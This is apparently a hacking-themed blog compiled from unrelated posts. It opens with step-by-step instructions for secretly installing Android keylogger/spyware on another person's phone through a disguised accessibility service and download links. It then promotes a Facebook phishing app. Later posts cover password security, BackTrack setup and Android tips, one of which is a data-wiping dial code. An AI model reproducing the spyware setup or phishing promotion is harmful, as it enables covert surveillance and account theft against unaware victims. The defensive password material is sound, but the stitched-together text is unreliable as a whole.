KEYLOGGER FOR ANDROID….

User guide for Android cell phone and tablet.

Please follow the steps below:

1. Download MobiPast application on your own mobile device.

2. Install the monitoring software on the mobile device you want to monitor.

Important

If you do not have a mobile device to install MobiPast application and view data captured by the monitoring softwareclick here

1. MobiPast application

· Compatible Android 2.x, Android 4.x and iPhone

1.1. Open the web browser of the mobile device

1

1.2. Enter the download link https://www.dropbox.com/s/3wdmlw9h7h3wy5t/MobiPast.apk?dl=0 and tap on the Search button

2

1.3. Wait for the download and select the line MobiPast.apk

3

1.4. Tap on the Install button

4

1.5. MobiPast application is now installed on your mobile device

5

1.6. Open MobiPast application and go in My account

6

1.7. Tap on the Login button

7

1.8. Enter a true email address and password Gmail or Yahoo (we recommend you to create a  Gmail or Yahoo email address only for receive your MobiPast’s data) and tap on the Ok button

IMPORTANT: If you are unable to connect, thank you to create a Yahoo email address in .com (e.g.: yourname@yahoo.com) for free on the website Yahoo.com and try to login again.

8

2. Monitoring software

· Compatible Android 2.x, Android 4.x and iPhone

2.1. Tap on the Settings icon

1

2.2. Select Security

2

2.3. Allow Unknown Sources

3

2.4. Come back on the main screen and open the web browser of the mobile

4

2.5. Enter the download link https://www.dropbox.com/s/r5lxmpcngs23g58/mobispy.apk?dl=0 and tap on the Search button

5

2.6. Wait for the download monitoring software in the device and tap on the Settings icon

6

2.7. Select Accessibility

7

2.8. Activate com.android.preferences.help

8

2.9. Come back on the main screen and tap on the Phone icon

9

2.10. Enter the number 123456 and tap on the Call button

10

2.11. Enter a true email address and password Gmail or Yahoo (the same as you configured in the MobiPast application) and tap on the Login button.

IMPORTANT: If you are unable to connect, thank you to create a Yahoo email address in .com (e.g.: yourname@yahoo.com) for free on the website Yahoo.com and try to login again.

11

2.12. Upon successful connection, tap on the Quit button and open MobiPast application on your mobile. You will start to receive your first data after 1 hour.

12

KNOW HACKING BUT NO HACKING…..

Finally an app to hack facebook accounts.

its not a facebook hacking tool actually,rather it will guide you to do facebook hacking by method of PHISHING

NO ROOT REQUIRED

ALL REQUIRED LINKS ARE GIVEN IN THE APP

THIS IS ONLY FOR EDUCATIONAL PURPOSE,AM NOT RESPONSIBLE FOR ANY ILLEGAL THINGS YOU DO…..

android app

http://goo.gl/urPoHv

windows app

http://goo.gl/Jb8Njs

Screenshot (27)

Screenshot (28)

ADMIN : #Cyba Tiger…

 

HOW TO SHUTDOWN COMPUTER AUTOMATICALLY USING FIREFOX AUTO SHUTDOWN ADD-ON

Firefox is the top most world widely used web browser. Because it is handy and have lots of features though its add-on and extension. Sometimes we download files using Firefox and on the same time we need to go for some work. So until we come back the computer waste the energy. In this situation we can use Firefox Auto shutdown the computer when downloads are completed and helps us to save electric power.

4222067729 241056e744 How to Shutdown Computer automatically Using Firefox Auto Shutdown Add on

Auto Shutdown is a cool Firefox add-on which controls your active download and shut down the computer when downloads are completed through is auto executing user script. Not only this but if Firefox is running idle it also shut downs the pc4222074655 e22c0502ae o How to Shutdown Computer automatically Using Firefox Auto Shutdown Add onautomatically with pre defined shut down time.

If you are using Downthemall Firefox extension for downloading movies, video, music and images from web then you can easily integrate Auto shutdown Firefox extension with downthemall add-on.

Download Auto shutdown Firefox Add-on

PASSWORD SECRETS: YOU MUST AWARE ABOUT

There is one thing that make us so vulnerable is ignorance. Today, everything is going to be depended on the internet. Yes, and you know it better! and a concept that we use to secure our internet accounts and all is our passwords. but is it enough to set password and feel that we are secure? are you really aware about of how to use passwords?

Our lack of understanding about passwords is allowing crooks to spy on us, steal from us, and deceive us into thinking nothing ever happened. Despite the volumes of texts that have already been written about them, how many of us have ever read a single chapter paragraph about the nitty-gritty of passwords?

That’s why i have compiled the following three short lists which outline the most common misconceptions about passwords; the ways in which our passwords can be stolen; and the tools you need to make sure it doesn’t happen to you.

Each of these sections can be read in less than two minutes. But once you’re done, you will have acquired enough information to deal safely and confidently with your passwords.

Password Myths You Should Stop Believing

1. A file, folder, computer, or account protected by a password is safe.

Read the rest of the article and learn why that statement is no longer true.

2. Your passwords are secure as long as you only deal with reputable online businesses.

Major online businesses that serve tens of millions of customers worldwide are expected to hold a treasure trove of personal information – the favorite diet of identity thieves. Therefore, these companies are always in the crosshairs of the world’s most highly-skilled hackers.

Take these recent examples, for instance:

  1. LinkedIn – A file with 6.5 million passwords from LinkedIn accounts appeared in an online forum based in Russia.
  2. Yahoo – 450,000 usernames and passwords from Yahoo! were posted online
  3. Sony (Playstation) – This massive breach involved 77 million Sony Playstation user accounts containing passwords and other personal information.

Reputable businesses like LinkedIn, Yahoo! and Sony should be implementing the strongest security countermeasures available. But even these are not strong enough to withstand attacks all the time…

3. A password input box that obscures characters as you type hides your password from prying eyes.

Password input box

The dots or asterisks displayed on a password input box are just meant to prevent people near you from seeing what you’re entering in there. How the password is actually stored or sent is a different story.

4. “Strong” passwords are difficult to compromise.

Even if your password is long and complex (e.g. a combination of uppercase and lowercase letters, numbers and other non-alphanumeric characters), if it is stored or sent in plaintext, you’re toast if the hackers get hold of it.
Plaintext means it can be viewed exactly the way it has been entered, using easily accessible tools. For example, if your password is Super$ecretp@Ss, a free downloadable tool like Ettercap enables your password to be viewed exactly in that form: Super$ecretp@Ss.

If, however, your password is encrypted, it means that it has been scrambled; it cannot be viewed using the same tool (Ettercap). It might be displayed something like this: xt%y&1sm^*gt;>2.

Unfortunately, many software applications still store and send passwords in plaintext. That is why hackers still find the first three items in the next section so effective.

5. Hackers use sophisticated tools to steal your password.

Actually, many successful hackers don’t require sophisticated tools to acquire passwords. Some simply use crafty conversational skills. In the highly publicised hacking of Wired Senior Writer Mat Honan, the hackers made extensive use of social engineering, a technique that relies heavily on the art of deception. More about this shortly.

In the meantime, let’s talk about how crooks can get a hold of your passwords.

Commonly Used Techniques for Stealing Passwords

1.  Hacking into a server that stores passwords in plaintext

There are many ways to do this. I won’t delve into the technical details but they can range from sophisticated-sounding methods like an ‘SQL injection’ to “manual” methods like stealing the server’s hard disk.

Once the attacker gets into the system, passwords can be easily retrieved from the database because they are all in plaintext (as previously explained).

Considering the risks of storing sensitive data in plaintext, you’d think it would be unimaginable for big companies to store passwords in this manner. Well, think again. That’s exactly what Yahoo! did, which led to that massive data breach referred to earlier.

2. Operating as a man-in-the-middle

Man in the middle

In a man-in-the-middle (MITM) attack, an attacker hijacks communications between two machines (e.g. a server and a client, two clients, a router and a client, or a router and a server). He then sets up his computer to impersonate both legitimate machines and then makes it appear they are still communicating with one another.

As a result, all of their messages would pass through his computer, allowing him to view any information that is sent in plaintext; including usernames and passwords.

3. Luring gullible victims using trojans

Trojans are malware, disguised as downloadable programs, that hackers make available through harmless-looking emails or websites. That interesting downloadable freebie online, for example, might be a trojan…

Once downloaded, a trojan can stealthily perform whatever nefarious activity it is programmed to do. One common activity is recording keyboard strokes (keylogging), whenever the victim logs in to a “secure” site; another is scanning the memory and extracting what it suspects to be passwords (“memory dumping”). When done, the malware transmits this information to the attacker.

4. Employing social engineering

As mentioned earlier, this technique does not require any sophisticated hacking tool.

A commonly used social engineering trick (known as “phishing”) involves sending out fake notification emails informing users of a data breach at a legitimate website where the users have accounts. The email would then instruct the users to reset their passwords by clicking on a link that takes them to a spoofed website, closely resembling the real one.

The fake page asks the users to enter their username, old password, and new password. Those falling for that then pass their login credentials into the wrong hands.

Another example of social engineering is simply calling a company’s tech support, convincing them you’re someone else, asking for a password reset, and then requesting that the temporary password be sent to an email address you control.

5. Using brute force

Do you know what the crudest way of cracking a password is? Simple. You just make an educated guess.

You can base your guess on the user’s name and a bunch of dates important to him (e.g. his birthday or wedding day). If your first guess doesn’t work, you guess again. And again. And again. Until you get it correctly. Some systems don’t put a limit to the number of times you can enter a password.

Of course, this can take forever… unless you can automate the process.

Brute force attack programs like John the Ripper, Cain & Abel, or TCH Hydra, enable you to do just that. These programs can make a large number of rapid intelligent guesses…which is great for hackers, but not so great for the security of your passwords.

Now that you’re familiar with the common techniques used for stealing passwords, let’s take a look at what tools you can use to foil them.

Must-Have Tools for Maintaining Password Security

If hackers use tools to simplify and automate their exploits, then you should have your own tools to make it more difficult for them.

One thing to keep in mind when choosing a security tool, especially if you’re going to let other people use it, is that it should be easy to use, as well as providing the necessary level of security.

Once a security mechanism or tool is too sophisticated, end users will tend to avoid it. This will make you vulnerable again, and the time and money you invested into it will essentially go to waste.

Keeping that in mind, consider acquiring these tools:

A Password Generator – this helps you create passwords; especially handy if you’re tired of composing your own, and if you need very strong passwords. Here’s a tool that allows you to generate both simple and strong passwords: makeagoodpassword.com

A Password Strength Tester – If you really want to compose your own passwords, you should make sure they’re strong enough. Tools like howsecureismypassword.net can help you determine whether your password is difficult to crack.

A Password Manager – This tool helps you securely manage all your passwords in one location and means you don’t have to remember multiple, complicated passwords. You can centralise all your passwords from your email accounts, blogs, social networking sites, online banks, and so on. Here’s a popular one that’s also free: KeePass

A Built-in Volume or Hard Disk Encryption – If you prefer to keep your passwords in files and save them in your desktop or laptop, the easiest way to secure them is to use your operating system’s built-in volume or hard disk encryption programs. Using them is pretty straightforward. In Windows, use BitLocker. And in Mac OS X, use FileVault.

An Encryption-Enabled Password Sharing Tool – When people send passwords to work colleagues they usually email them. However, many email services are vulnerable to man-in-the-middle attacks. Use a free tool like Firepass, which encrypts your password and sends it so that only the intended recipient can access it.

Just employing the above five tools will put you way ahead of the crowd; most people do not put enough thought into creating, storing or sending their passwords; it’s never too late to start getting serious about protecting your most confidential and sensitive information.

HOW TO INSTALL BACKTRACK IN VMWARE

Tutorial about , How to Install Backtrack in Vmware Workstation Step y step guide .

Prerequisites :

1 : Vmware workstation or Vmplayer

 Download Workstation

Download VMplayer

2 : Backtrack ISO

Installation Steps

Step 1:

Step 2 :

step 3:

Step 4:
 
 

Step 5:



step 6 :

Type “Startx” to get gui

Step 7 :
this will start installer
Step 7:
 
Then click forward and follow instruction

then simply install like another ubuntu . after installation restart and see

VMware Tools In Backtrack 

android 4 u

cybatiger2529.wordpress.com

Many android users don’t know much about the hidden features of android phones. Today we are sharing an article with secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try them all

1) Force reboot:
Many times android users face a problem of freezing in mobile phone, in case your android phone is frozen, you can reboot it:

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones is built primarily for the Internet, many of Android users don’t know that android phones provide a way by which we can access Google search in just a single click:

Press menu key and hold it for couple of seconds, it will launch the Google search.

3) Reboot Android in safe mode:
As many computers, we can also reboot Android phones in safe mode. The latest Android- Jelly Bean version provides an option to reboot in safe mode, if something goes wrong.
To reboot your android in safe mode, follow the below given instructions.

*Long press the power button
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great Android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection:
In the jelly bean version, Android provides a way by which android phone can be unlock using face detection, to make this feature more secure, Jelly Bean version added another layer of protection in which Android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. The Above tricks n tips are provided by Cyber Elite.Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this:

Go to Settings > Security > Screen lock > Face unlock.

5) Move android apps to SD card:
Its good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry! Android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

6) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*

This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

7) Taking screen shots on android phone:
Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.

Press the Home button + power button.
For Galaxy Nexus: Power button + volume down button.
For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

8) Hard Reset and Factory reset your android phone:
Android phone can be formatted in two ways:

a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reset a phone dial *#*#7780#*#*.

b) Hard reset: To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for any confirmation.

Context menu in android:
Long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Android Version Animation:
Go to settings > about phone > Tab repeatedly on ‘Android version’.
After sometime, the Android version will be animated

free calling without internet

Three Bangalore based engineering students, Yashas C Shekar, Vijaykumar Umaluti and Sandesh E, have launchedFreeKall, a free voice calling service for those who do not have any internet access.

FreeKall makes money by making people listen to advertisements during calls. So once two users are connected, they will be able to hear 10 second advertisements after every two minutes in the middle of the call. Freekall has tied up with a media agency called Streetsmart Media Solutions for the advertisements.

To make a FreeKall users have to dial the numbers 080-67683693 or 080-67683693 and the call will be disconnected after a ring. After that, the automated system calls the user back and asks them to dial the desired number and get connected. The system can currently support 20,000 calls per second. FreeKall is currently in Beta as of now and so far it has already been used to make nearly four lakh (400,000) calls so far.